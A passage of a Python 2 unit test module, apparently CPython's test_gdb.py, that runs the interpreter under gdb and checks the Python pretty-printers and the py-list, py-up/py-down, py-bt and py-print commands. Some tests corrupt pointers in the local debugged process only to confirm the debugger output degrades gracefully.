    #   'GNU gdb (GDB; SUSE Linux Enterprise 12) 7.7\n'   -> 7.7
    #   'GNU gdb (GDB) Fedora 7.9.1-17.fc22\n'            -> 7.9
    #   'GNU gdb 6.1.1 [FreeBSD]\n'                       -> 6.1
    #   'GNU gdb (GDB) Fedora (7.5.1-37.fc18)\n'          -> 7.5
    match = re.search(r"^GNU gdb.*?\b(\d+)\.(\d+)", version)
    if match is None:
        raise Exception("unable to parse GDB version: %r" % version)
    major = int(match.group(1))
    minor = int(match.group(2))
    return (version, major, minor)
# Probe gdb once at import time; all checks below gate on the result.
gdb_version, gdb_major_version, gdb_minor_version = get_gdb_version()
if gdb_major_version < 7:
    # The pretty-printer hooks need gdb's embedded Python, added in gdb 7.0.
    raise unittest.SkipTest("gdb versions before 7.0 didn't support python "
                            "embedding. Saw %s.%s:\n%s"
                            % (gdb_major_version, gdb_minor_version,
                               gdb_version))
if sys.platform.startswith("sunos"):
    raise unittest.SkipTest("test doesn't work very well on Solaris")
# Location of custom hooks file in a repository checkout.
checkout_hook_path = os.path.join(os.path.dirname(sys.executable),
                                  'python-gdb.py')
def run_gdb(*args, **env_vars):
    """Runs gdb in batch mode with the additional arguments given by *args.

    Returns its (stdout, stderr)
    """
    env = None
    if env_vars:
        env = os.environ.copy()
        env.update(env_vars)
    # -nx: Do not execute commands from any .gdbinit initialization files
    # (issue #22188)
    cmd = ['gdb', '--batch', '-nx']
    if (gdb_major_version, gdb_minor_version) >= (7, 4):
        cmd += ['-iex', 'add-auto-load-safe-path ' + checkout_hook_path]
    proc = subprocess.Popen(cmd + list(args),
                            # Redirect stdin to prevent GDB from messing with
                            # terminal settings
                            stdin=subprocess.PIPE,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            env=env)
    return proc.communicate()
# Skip unless we are running from a source build: the hooks file lives next
# to the built interpreter.
if not sysconfig.is_python_build():
    raise unittest.SkipTest("test_gdb only works on source builds at the moment.")

# Verify that "gdb" was built with the embedded python support enabled:
gdbpy_version, _ = run_gdb("--eval-command=python import sys; print(sys.version_info)")
if not gdbpy_version:
    raise unittest.SkipTest("gdb not built with embedded python support")

# Verify that "gdb" can load our custom hooks, as OS security settings may
# disallow this without a customised .gdbinit.
# (Removed a dead `cmd = ['--args', sys.executable]` local that was never
# used; the arguments are passed directly to run_gdb below.)
_, gdbpy_errors = run_gdb('--args', sys.executable)
if "auto-loading has been declined" in gdbpy_errors:
    msg = "gdb security settings prevent use of custom hooks: "
    raise unittest.SkipTest(msg + gdbpy_errors.rstrip())
def python_is_optimized():
    """Whether this Python build was compiled with optimizations enabled.

    The last -O* flag appearing in PY_CFLAGS wins; anything other than
    no flag at all, -O0 or -Og counts as optimized.
    """
    opt_flags = [flag
                 for flag in sysconfig.get_config_vars()['PY_CFLAGS'].split()
                 if flag.startswith('-O')]
    last_opt = opt_flags[-1] if opt_flags else ''
    return last_opt not in ('', '-O0', '-Og')
def gdb_has_frame_select():
    """Probe whether this gdb exposes gdb.Frame.select (needed by py-up/py-down)."""
    stdout, _ = run_gdb("--eval-command=python print(dir(gdb.Frame))")
    match = re.match(r'.*\[(.*)\].*', stdout)
    if match is None:
        raise unittest.SkipTest("Unable to parse output from gdb.Frame.select test")
    # dir() output is rendered as "['a', 'b', ...]"; look for a quoted 'select'.
    return "'select'" in match.group(1).split(', ')
# Capability flag probed once at import time; used by skip decorators below.
HAS_PYUP_PYDOWN = gdb_has_frame_select()
class DebuggerTests(unittest.TestCase):

    """Test that the debugger can debug Python."""

    def get_stack_trace(self, source=None, script=None,
                        breakpoint='PyObject_Print',
                        cmds_after_breakpoint=None,
                        import_site=False):
        '''
        Run 'python -c SOURCE' under gdb with a breakpoint.

        Support injecting commands after the breakpoint is reached

        Returns the stdout from gdb

        cmds_after_breakpoint: if provided, a list of strings: gdb commands
        '''
        # We use "set breakpoint pending yes" to avoid blocking with a:
        #   Function "foo" not defined.
        #   Make breakpoint pending on future shared library load? (y or [n])
        # error, which typically happens python is dynamically linked (the
        # breakpoints of interest are to be found in the shared library)
        # When this happens, we still get:
        #   Function "PyObject_Print" not defined.
        # emitted to stderr each time, alas.

        # Initially I had "--eval-command=continue" here, but removed it to
        # avoid repeated print breakpoints when traversing hierarchical data
        # structures

        # Generate a list of commands in gdb's language:
        commands = ['set breakpoint pending yes',
                    'break %s' % breakpoint,

                    # The tests assume that the first frame of printed
                    # backtrace will not contain program counter,
                    # that is however not guaranteed by gdb
                    # therefore we need to use 'set print address off' to
                    # make sure the counter is not there. For example:
                    # #0 in PyObject_Print ...
                    # is assumed, but sometimes this can be e.g.
                    # #0 0x00003fffb7dd1798 in PyObject_Print ...
                    'set print address off',

                    'run']

        # GDB as of 7.4 onwards can distinguish between the
        # value of a variable at entry vs current value:
        #   http://sourceware.org/gdb/onlinedocs/gdb/Variables.html
        # which leads to the selftests failing with errors like this:
        #   AssertionError: 'v@entry=()' != '()'
        # Disable this:
        if (gdb_major_version, gdb_minor_version) >= (7, 4):
            commands += ['set print entry-values no']

        if cmds_after_breakpoint:
            commands += cmds_after_breakpoint
        else:
            commands += ['backtrace']

        # print commands

        # Use "commands" to generate the arguments with which to invoke "gdb":
        args = ["gdb", "--batch", "-nx"]
        args += ['--eval-command=%s' % cmd for cmd in commands]
        args += ["--args",
                 sys.executable]

        if not import_site:
            # -S suppresses the default 'import site'
            args += ["-S"]

        if source:
            args += ["-c", source]
        elif script:
            args += [script]

        # print args
        # print ' '.join(args)

        # Use "args" to invoke gdb, capturing stdout, stderr:
        out, err = run_gdb(*args, PYTHONHASHSEED='0')

        errlines = err.splitlines()
        unexpected_errlines = []

        # Ignore some benign messages on stderr.
        ignore_patterns = (
            'Function "%s" not defined.' % breakpoint,
            "warning: no loadable sections found in added symbol-file"
            " system-supplied DSO",
            "warning: Unable to find libthread_db matching"
            " inferior's thread library, thread debugging will"
            " not be available.",
            "warning: Cannot initialize thread debugging"
            " library: Debugger service failed",
            'warning: Could not load shared library symbols for '
            'linux-vdso.so',
            'warning: Could not load shared library symbols for '
            'linux-gate.so',
            'warning: Could not load shared library symbols for '
            'linux-vdso64.so',
            'Do you need "set solib-search-path" or '
            '"set sysroot"?',
            'warning: Source file is more recent than executable.',
            # Issue #19753: missing symbols on System Z
            'Missing separate debuginfo for ',
            'Try: zypper install -C ',
            )
        for line in errlines:
            if not line.startswith(ignore_patterns):
                unexpected_errlines.append(line)

        # Ensure no unexpected error messages:
        self.assertEqual(unexpected_errlines, [])
        return out

    def get_gdb_repr(self, source,
                     cmds_after_breakpoint=None,
                     import_site=False):
        # Given an input python source representation of data,
        # run "python -c'print DATA'" under gdb with a breakpoint on
        # PyObject_Print and scrape out gdb's representation of the "op"
        # parameter, and verify that the gdb displays the same string
        #
        # For a nested structure, the first time we hit the breakpoint will
        # give us the top-level structure
        gdb_output = self.get_stack_trace(source, breakpoint='PyObject_Print',
                                          cmds_after_breakpoint=cmds_after_breakpoint,
                                          import_site=import_site)
        # gdb can insert additional '\n' and space characters in various places
        # in its output, depending on the width of the terminal it's connected
        # to (using its "wrap_here" function)
        m = re.match('.*#0\s+PyObject_Print\s+\(\s*op\=\s*(.*?),\s+fp=.*\).*',
                     gdb_output, re.DOTALL)
        if not m:
            self.fail('Unexpected gdb output: %r\n%s' % (gdb_output, gdb_output))
        return m.group(1), gdb_output

    def assertEndsWith(self, actual, exp_end):
        '''Ensure that the given "actual" string ends with "exp_end"'''
        self.assertTrue(actual.endswith(exp_end),
                        msg='%r did not end with %r' % (actual, exp_end))

    def assertMultilineMatches(self, actual, pattern):
        # re.DOTALL lets '.' span newlines so a single pattern can cover
        # multi-line gdb output.
        m = re.match(pattern, actual, re.DOTALL)
        self.assertTrue(m, msg='%r did not match %r' % (actual, pattern))

    def get_sample_script(self):
        # Helper script exercised by the py-list / py-up / py-bt tests.
        return findfile('gdb_sample.py')
@unittest.skipIf(python_is_optimized(),
                 "Python was compiled with optimizations")
class PrettyPrintTests(DebuggerTests):
    """Verify the gdb pretty-printer hooks for the core Python 2 types."""

    def test_getting_backtrace(self):
        gdb_output = self.get_stack_trace('print 42')
        self.assertTrue('PyObject_Print' in gdb_output)

    def assertGdbRepr(self, val, cmds_after_breakpoint=None):
        # Ensure that gdb's rendering of the value in a debugged process
        # matches repr(value) in this process:
        gdb_repr, gdb_output = self.get_gdb_repr('print ' + repr(val),
                                                 cmds_after_breakpoint)
        self.assertEqual(gdb_repr, repr(val))

    def test_int(self):
        'Verify the pretty-printing of various "int" values'
        self.assertGdbRepr(42)
        self.assertGdbRepr(0)
        self.assertGdbRepr(-7)
        self.assertGdbRepr(sys.maxint)
        self.assertGdbRepr(-sys.maxint)

    def test_long(self):
        'Verify the pretty-printing of various "long" values'
        self.assertGdbRepr(0L)
        self.assertGdbRepr(1000000000000L)
        self.assertGdbRepr(-1L)
        self.assertGdbRepr(-1000000000000000L)

    def test_singletons(self):
        'Verify the pretty-printing of True, False and None'
        self.assertGdbRepr(True)
        self.assertGdbRepr(False)
        self.assertGdbRepr(None)

    def test_dicts(self):
        'Verify the pretty-printing of dictionaries'
        self.assertGdbRepr({})
        self.assertGdbRepr({'foo': 'bar'})
        self.assertGdbRepr("{'foo': 'bar', 'douglas':42}")

    def test_lists(self):
        'Verify the pretty-printing of lists'
        self.assertGdbRepr([])
        self.assertGdbRepr(range(5))

    def test_strings(self):
        'Verify the pretty-printing of strings'
        self.assertGdbRepr('')
        self.assertGdbRepr('And now for something hopefully the same')
        self.assertGdbRepr('string with embedded NUL here \0 and then some more text')
        self.assertGdbRepr('this is byte 255:\xff and byte 128:\x80')

    def test_tuples(self):
        'Verify the pretty-printing of tuples'
        self.assertGdbRepr(tuple())
        self.assertGdbRepr((1,))
        self.assertGdbRepr(('foo', 'bar', 'baz'))

    def test_unicode(self):
        'Verify the pretty-printing of unicode values'
        # Test the empty unicode string:
        self.assertGdbRepr(u'')

        self.assertGdbRepr(u'hello world')

        # Test printing a single character:
        #    U+2620 SKULL AND CROSSBONES
        self.assertGdbRepr(u'\u2620')

        # Test printing a Japanese unicode string
        # (I believe this reads "mojibake", using 3 characters from the CJK
        # Unified Ideographs area, followed by U+3051 HIRAGANA LETTER KE)
        self.assertGdbRepr(u'\u6587\u5b57\u5316\u3051')

        # Test a character outside the BMP:
        #    U+1D121 MUSICAL SYMBOL C CLEF
        # This is:
        # UTF-8: 0xF0 0x9D 0x84 0xA1
        # UTF-16: 0xD834 0xDD21
        # This will only work on wide-unicode builds:
        self.assertGdbRepr(u"\U0001D121")

    def test_sets(self):
        'Verify the pretty-printing of sets'
        self.assertGdbRepr(set())
        rep = self.get_gdb_repr("print set(['a', 'b'])")[0]
        self.assertTrue(rep.startswith("set(["))
        self.assertTrue(rep.endswith("])"))
        self.assertEqual(eval(rep), {'a', 'b'})
        rep = self.get_gdb_repr("print set([4, 5])")[0]
        self.assertTrue(rep.startswith("set(["))
        self.assertTrue(rep.endswith("])"))
        self.assertEqual(eval(rep), {4, 5})

        # Ensure that we handled sets containing the "dummy" key value,
        # which happens on deletion:
        gdb_repr, gdb_output = self.get_gdb_repr('''s = set(['a','b'])
s.pop()
print s''')
        self.assertEqual(gdb_repr, "set(['b'])")

    def test_frozensets(self):
        'Verify the pretty-printing of frozensets'
        self.assertGdbRepr(frozenset())
        rep = self.get_gdb_repr("print frozenset(['a', 'b'])")[0]
        self.assertTrue(rep.startswith("frozenset(["))
        self.assertTrue(rep.endswith("])"))
        self.assertEqual(eval(rep), {'a', 'b'})
        rep = self.get_gdb_repr("print frozenset([4, 5])")[0]
        self.assertTrue(rep.startswith("frozenset(["))
        self.assertTrue(rep.endswith("])"))
        self.assertEqual(eval(rep), {4, 5})

    def test_exceptions(self):
        # Test a RuntimeError
        gdb_repr, gdb_output = self.get_gdb_repr('''
try:
    raise RuntimeError("I am an error")
except RuntimeError, e:
    print e
''')
        self.assertEqual(gdb_repr,
                         "exceptions.RuntimeError('I am an error',)")

        # Test division by zero:
        gdb_repr, gdb_output = self.get_gdb_repr('''
try:
    a = 1 / 0
except ZeroDivisionError, e:
    print e
''')
        self.assertEqual(gdb_repr,
                         "exceptions.ZeroDivisionError('integer division or modulo by zero',)")

    def test_classic_class(self):
        'Verify the pretty-printing of classic class instances'
        gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo:
    pass
foo = Foo()
foo.an_int = 42
print foo''')
        m = re.match(r'<Foo\(an_int=42\) at remote 0x[0-9a-f]+>', gdb_repr)
        self.assertTrue(m,
                        msg='Unexpected classic-class rendering %r' % gdb_repr)

    def test_modern_class(self):
        'Verify the pretty-printing of new-style class instances'
        gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo(object):
    pass
foo = Foo()
foo.an_int = 42
print foo''')
        m = re.match(r'<Foo\(an_int=42\) at remote 0x[0-9a-f]+>', gdb_repr)
        self.assertTrue(m,
                        msg='Unexpected new-style class rendering %r' % gdb_repr)

    def test_subclassing_list(self):
        'Verify the pretty-printing of an instance of a list subclass'
        gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo(list):
    pass
foo = Foo()
foo += [1, 2, 3]
foo.an_int = 42
print foo''')
        m = re.match(r'<Foo\(an_int=42\) at remote 0x[0-9a-f]+>', gdb_repr)
        self.assertTrue(m,
                        msg='Unexpected new-style class rendering %r' % gdb_repr)

    def test_subclassing_tuple(self):
        'Verify the pretty-printing of an instance of a tuple subclass'
        # This should exercise the negative tp_dictoffset code in the
        # new-style class support
        gdb_repr, gdb_output = self.get_gdb_repr('''
class Foo(tuple):
    pass
foo = Foo((1, 2, 3))
foo.an_int = 42
print foo''')
        m = re.match(r'<Foo\(an_int=42\) at remote 0x[0-9a-f]+>', gdb_repr)
        self.assertTrue(m,
                        msg='Unexpected new-style class rendering %r' % gdb_repr)

    def assertSane(self, source, corruption, expvalue=None, exptype=None):
        '''Run Python under gdb, corrupting variables in the inferior process
        immediately before taking a backtrace.

        Verify that the variable's representation is the expected failsafe
        representation'''
        if corruption:
            cmds_after_breakpoint=[corruption, 'backtrace']
        else:
            cmds_after_breakpoint=['backtrace']

        gdb_repr, gdb_output = \
            self.get_gdb_repr(source,
                              cmds_after_breakpoint=cmds_after_breakpoint)
        if expvalue:
            if gdb_repr == repr(expvalue):
                # gdb managed to print the value in spite of the corruption;
                # this is good (see http://bugs.python.org/issue8330)
                return

        if exptype:
            pattern = '<' + exptype + ' at remote 0x[0-9a-f]+>'
        else:
            # Match anything for the type name; 0xDEADBEEF could point to
            # something arbitrary (see http://bugs.python.org/issue8330)
            pattern = '<.* at remote 0x[0-9a-f]+>'

        m = re.match(pattern, gdb_repr)
        if not m:
            self.fail('Unexpected gdb representation: %r\n%s' % \
                          (gdb_repr, gdb_output))

    def test_NULL_ptr(self):
        'Ensure that a NULL PyObject* is handled gracefully'
        gdb_repr, gdb_output = (
            self.get_gdb_repr('print 42',
                              cmds_after_breakpoint=['set variable op=0',
                                                     'backtrace'])
            )
        self.assertEqual(gdb_repr, '0x0')

    def test_NULL_ob_type(self):
        'Ensure that a PyObject* with NULL ob_type is handled gracefully'
        self.assertSane('print 42',
                        'set op->ob_type=0')

    def test_corrupt_ob_type(self):
        'Ensure that a PyObject* with a corrupt ob_type is handled gracefully'
        self.assertSane('print 42',
                        'set op->ob_type=0xDEADBEEF',
                        expvalue=42)

    def test_corrupt_tp_flags(self):
        'Ensure that a PyObject* with a type with corrupt tp_flags is handled'
        self.assertSane('print 42',
                        'set op->ob_type->tp_flags=0x0',
                        expvalue=42)

    def test_corrupt_tp_name(self):
        'Ensure that a PyObject* with a type with corrupt tp_name is handled'
        self.assertSane('print 42',
                        'set op->ob_type->tp_name=0xDEADBEEF',
                        expvalue=42)

    def test_NULL_instance_dict(self):
        'Ensure that a PyInstanceObject with with a NULL in_dict is handled'
        self.assertSane('''
class Foo:
    pass
foo = Foo()
foo.an_int = 42
print foo''',
                        'set ((PyInstanceObject*)op)->in_dict = 0',
                        exptype='Foo')

    def test_builtins_help(self):
        'Ensure that the new-style class _Helper in site.py can be handled'
        # (this was the issue causing tracebacks in
        #  http://bugs.python.org/issue8032#msg100537 )
        gdb_repr, gdb_output = self.get_gdb_repr('print __builtins__.help', import_site=True)
        m = re.match(r'<_Helper at remote 0x[0-9a-f]+>', gdb_repr)
        self.assertTrue(m,
                        msg='Unexpected rendering %r' % gdb_repr)

    def test_selfreferential_list(self):
        '''Ensure that a reference loop involving a list doesn't lead proxyval
        into an infinite loop:'''
        gdb_repr, gdb_output = \
            self.get_gdb_repr("a = [3, 4, 5] ; a.append(a) ; print a")
        self.assertEqual(gdb_repr, '[3, 4, 5, [...]]')

        gdb_repr, gdb_output = \
            self.get_gdb_repr("a = [3, 4, 5] ; b = [a] ; a.append(b) ; print a")
        self.assertEqual(gdb_repr, '[3, 4, 5, [[...]]]')

    def test_selfreferential_dict(self):
        '''Ensure that a reference loop involving a dict doesn't lead proxyval
        into an infinite loop:'''
        gdb_repr, gdb_output = \
            self.get_gdb_repr("a = {} ; b = {'bar':a} ; a['foo'] = b ; print a")
        self.assertEqual(gdb_repr, "{'foo': {'bar': {...}}}")

    def test_selfreferential_old_style_instance(self):
        gdb_repr, gdb_output = \
            self.get_gdb_repr('''
class Foo:
    pass
foo = Foo()
foo.an_attr = foo
print foo''')
        self.assertTrue(re.match('<Foo\(an_attr=<\.\.\.>\) at remote 0x[0-9a-f]+>',
                                 gdb_repr),
                        'Unexpected gdb representation: %r\n%s' % \
                            (gdb_repr, gdb_output))

    def test_selfreferential_new_style_instance(self):
        gdb_repr, gdb_output = \
            self.get_gdb_repr('''
class Foo(object):
    pass
foo = Foo()
foo.an_attr = foo
print foo''')
        self.assertTrue(re.match('<Foo\(an_attr=<\.\.\.>\) at remote 0x[0-9a-f]+>',
                                 gdb_repr),
                        'Unexpected gdb representation: %r\n%s' % \
                            (gdb_repr, gdb_output))

        gdb_repr, gdb_output = \
            self.get_gdb_repr('''
class Foo(object):
    pass
a = Foo()
b = Foo()
a.an_attr = b
b.an_attr = a
print a''')
        self.assertTrue(re.match('<Foo\(an_attr=<Foo\(an_attr=<\.\.\.>\) at remote 0x[0-9a-f]+>\) at remote 0x[0-9a-f]+>',
                                 gdb_repr),
                        'Unexpected gdb representation: %r\n%s' % \
                            (gdb_repr, gdb_output))

    def test_truncation(self):
        'Verify that very long output is truncated'
        gdb_repr, gdb_output = self.get_gdb_repr('print range(1000)')
        self.assertEqual(gdb_repr,
                         "[0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, "
                         "14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, "
                         "27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, "
                         "40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, "
                         "53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, "
                         "66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, "
                         "79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, "
                         "92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, "
                         "104, 105, 106, 107, 108, 109, 110, 111, 112, 113, "
                         "114, 115, 116, 117, 118, 119, 120, 121, 122, 123, "
                         "124, 125, 126, 127, 128, 129, 130, 131, 132, 133, "
                         "134, 135, 136, 137, 138, 139, 140, 141, 142, 143, "
                         "144, 145, 146, 147, 148, 149, 150, 151, 152, 153, "
                         "154, 155, 156, 157, 158, 159, 160, 161, 162, 163, "
                         "164, 165, 166, 167, 168, 169, 170, 171, 172, 173, "
                         "174, 175, 176, 177, 178, 179, 180, 181, 182, 183, "
                         "184, 185, 186, 187, 188, 189, 190, 191, 192, 193, "
                         "194, 195, 196, 197, 198, 199, 200, 201, 202, 203, "
                         "204, 205, 206, 207, 208, 209, 210, 211, 212, 213, "
                         "214, 215, 216, 217, 218, 219, 220, 221, 222, 223, "
                         "224, 225, 226...(truncated)")
        # The proxy caps its output at 1024 characters plus the marker:
        self.assertEqual(len(gdb_repr),
                         1024 + len('...(truncated)'))

    def test_builtin_function(self):
        gdb_repr, gdb_output = self.get_gdb_repr('print len')
        self.assertEqual(gdb_repr, '<built-in function len>')

    def test_builtin_method(self):
        gdb_repr, gdb_output = self.get_gdb_repr('import sys; print sys.stdout.readlines')
        self.assertTrue(re.match('<built-in method readlines of file object at remote 0x[0-9a-f]+>',
                                 gdb_repr),
                        'Unexpected gdb representation: %r\n%s' % \
                            (gdb_repr, gdb_output))

    def test_frames(self):
        gdb_output = self.get_stack_trace('''
def foo(a, b, c):
    pass

foo(3, 4, 5)
print foo.__code__''',
                                          breakpoint='PyObject_Print',
                                          cmds_after_breakpoint=['print (PyFrameObject*)(((PyCodeObject*)op)->co_zombieframe)']
                                          )
        self.assertTrue(re.match(r'.*\s+\$1 =\s+Frame 0x[0-9a-f]+, for file <string>, line 3, in foo \(\)\s+.*',
                                 gdb_output,
                                 re.DOTALL),
                        'Unexpected gdb representation: %r\n%s' % (gdb_output, gdb_output))
@unittest.skipIf(python_is_optimized(),
                 "Python was compiled with optimizations")
class PyListTests(DebuggerTests):
    """Tests for the "py-list" gdb command (source listing of Python frames)."""

    def assertListing(self, expected, actual):
        self.assertEndsWith(actual, expected)

    def test_basic_command(self):
        'Verify that the "py-list" command works'
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-list'])

        self.assertListing('   5    \n'
                           '   6    def bar(a, b, c):\n'
                           '   7        baz(a, b, c)\n'
                           '   8    \n'
                           '   9    def baz(*args):\n'
                           ' >10        print(42)\n'
                           '  11    \n'
                           '  12    foo(1, 2, 3)\n',
                           bt)

    def test_one_abs_arg(self):
        'Verify the "py-list" command with one absolute argument'
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-list 9'])

        self.assertListing('   9    def baz(*args):\n'
                           ' >10        print(42)\n'
                           '  11    \n'
                           '  12    foo(1, 2, 3)\n',
                           bt)

    def test_two_abs_args(self):
        'Verify the "py-list" command with two absolute arguments'
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-list 1,3'])

        self.assertListing('   1    # Sample script for use by test_gdb.py\n'
                           '   2    \n'
                           '   3    def foo(a, b, c):\n',
                           bt)
class StackNavigationTests(DebuggerTests):
    """Tests for the "py-up" / "py-down" stack navigation commands."""

    @unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_pyup_command(self):
        'Verify that the "py-up" command works'
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-up'])
        self.assertMultilineMatches(bt,
                                    r'''^.*
#[0-9]+ Frame 0x[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
    baz\(a, b, c\)
$''')

    @unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
    def test_down_at_bottom(self):
        'Verify handling of "py-down" at the bottom of the stack'
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-down'])
        self.assertEndsWith(bt,
                            'Unable to find a newer python frame\n')

    @unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_up_at_top(self):
        'Verify handling of "py-up" at the top of the stack'
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-up'] * 4)
        self.assertEndsWith(bt,
                            'Unable to find an older python frame\n')

    @unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_up_then_down(self):
        'Verify "py-up" followed by "py-down"'
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-up', 'py-down'])
        self.assertMultilineMatches(bt,
                                    r'''^.*
#[0-9]+ Frame 0x[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
    baz\(a, b, c\)
#[0-9]+ Frame 0x[0-9a-f]+, for file .*gdb_sample.py, line 10, in baz \(args=\(1, 2, 3\)\)
    print\(42\)
$''')
class PyBtTests(DebuggerTests):
    """Tests for the "py-bt" / "py-bt-full" Python-level backtrace commands."""

    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_bt(self):
        'Verify that the "py-bt" command works'
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-bt'])
        self.assertMultilineMatches(bt,
                                    r'''^.*
Traceback \(most recent call first\):
  File ".*gdb_sample.py", line 10, in baz
    print\(42\)
  File ".*gdb_sample.py", line 7, in bar
    baz\(a, b, c\)
  File ".*gdb_sample.py", line 4, in foo
    bar\(a, b, c\)
  File ".*gdb_sample.py", line 12, in <module>
    foo\(1, 2, 3\)
''')

    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_bt_full(self):
        'Verify that the "py-bt-full" command works'
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-bt-full'])
        self.assertMultilineMatches(bt,
                                    r'''^.*
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 7, in bar \(a=1, b=2, c=3\)
    baz\(a, b, c\)
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 4, in foo \(a=1, b=2, c=3\)
    bar\(a, b, c\)
#[0-9]+ Frame 0x-?[0-9a-f]+, for file .*gdb_sample.py, line 12, in <module> \(\)
    foo\(1, 2, 3\)
''')

    @unittest.skipUnless(thread,
                         "Python was compiled without thread support")
    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_threads(self):
        'Verify that "py-bt" indicates threads that are waiting for the GIL'
        cmd = '''
from threading import Thread

class TestThread(Thread):
    # These threads would run forever, but we'll interrupt things with the
    # debugger
    def run(self):
        i = 0
        while 1:
             i += 1

t = {}
for i in range(4):
    t[i] = TestThread()
    t[i].start()

# Trigger a breakpoint on the main thread
print 42

'''
        # Verify with "py-bt":
        gdb_output = self.get_stack_trace(cmd,
                                          cmds_after_breakpoint=['thread apply all py-bt'])
        self.assertIn('Waiting for the GIL', gdb_output)

        # Verify with "py-bt-full":
        gdb_output = self.get_stack_trace(cmd,
                                          cmds_after_breakpoint=['thread apply all py-bt-full'])
        self.assertIn('Waiting for the GIL', gdb_output)

    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    # Some older versions of gdb will fail with
    #  "Cannot find new threads: generic error"
    # unless we add LD_PRELOAD=PATH-TO-libpthread.so.1 as a workaround
    @unittest.skipUnless(thread,
                         "Python was compiled without thread support")
    def test_gc(self):
        'Verify that "py-bt" indicates if a thread is garbage-collecting'
        cmd = ('from gc import collect\n'
               'print 42\n'
               'def foo():\n'
               '    collect()\n'
               'def bar():\n'
               '    foo()\n'
               'bar()\n')
        # Verify with "py-bt":
        gdb_output = self.get_stack_trace(cmd,
                                          cmds_after_breakpoint=['break update_refs', 'continue', 'py-bt'],
                                          )
        self.assertIn('Garbage-collecting', gdb_output)

        # Verify with "py-bt-full":
        gdb_output = self.get_stack_trace(cmd,
                                          cmds_after_breakpoint=['break update_refs', 'continue', 'py-bt-full'],
                                          )
        self.assertIn('Garbage-collecting', gdb_output)

    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    # Some older versions of gdb will fail with
    #  "Cannot find new threads: generic error"
    # unless we add LD_PRELOAD=PATH-TO-libpthread.so.1 as a workaround
    @unittest.skipUnless(thread,
                         "Python was compiled without thread support")
    def test_pycfunction(self):
        'Verify that "py-bt" displays invocations of PyCFunction instances'
        # Tested function must not be defined with METH_NOARGS or METH_O,
        # otherwise call_function() doesn't call PyCFunction_Call()
        cmd = ('from time import gmtime\n'
               'def foo():\n'
               '    gmtime(1)\n'
               'def bar():\n'
               '    foo()\n'
               'bar()\n')
        # Verify with "py-bt":
        gdb_output = self.get_stack_trace(cmd,
                                          breakpoint='time_gmtime',
                                          cmds_after_breakpoint=['bt', 'py-bt'],
                                          )
        self.assertIn('<built-in function gmtime', gdb_output)

        # Verify with "py-bt-full":
        gdb_output = self.get_stack_trace(cmd,
                                          breakpoint='time_gmtime',
                                          cmds_after_breakpoint=['py-bt-full'],
                                          )
        self.assertIn('#0 <built-in function gmtime', gdb_output)
class PyPrintTests(DebuggerTests):
    """Tests for the "py-print" command (printing locals/globals/builtins)."""

    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_basic_command(self):
        'Verify that the "py-print" command works'
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-print args'])
        self.assertMultilineMatches(bt,
                                    r".*\nlocal 'args' = \(1, 2, 3\)\n.*")

    @unittest.skipUnless(HAS_PYUP_PYDOWN, "test requires py-up/py-down commands")
    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_print_after_up(self):
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-up', 'py-print c', 'py-print b', 'py-print a'])
        self.assertMultilineMatches(bt,
                                    r".*\nlocal 'c' = 3\nlocal 'b' = 2\nlocal 'a' = 1\n.*")

    @unittest.skipIf(python_is_optimized(),
                     "Python was compiled with optimizations")
    def test_printing_global(self):
        bt = self.get_stack_trace(script=self.get_sample_script(),
                                  cmds_after_breakpoint=['py-print __name__'])
        self.assertMultilineMatches(bt,
                                    r".*\nglobal '__name__' = '__main__'\n.*")

    @unittest.skipIf(python_is_optimized(),
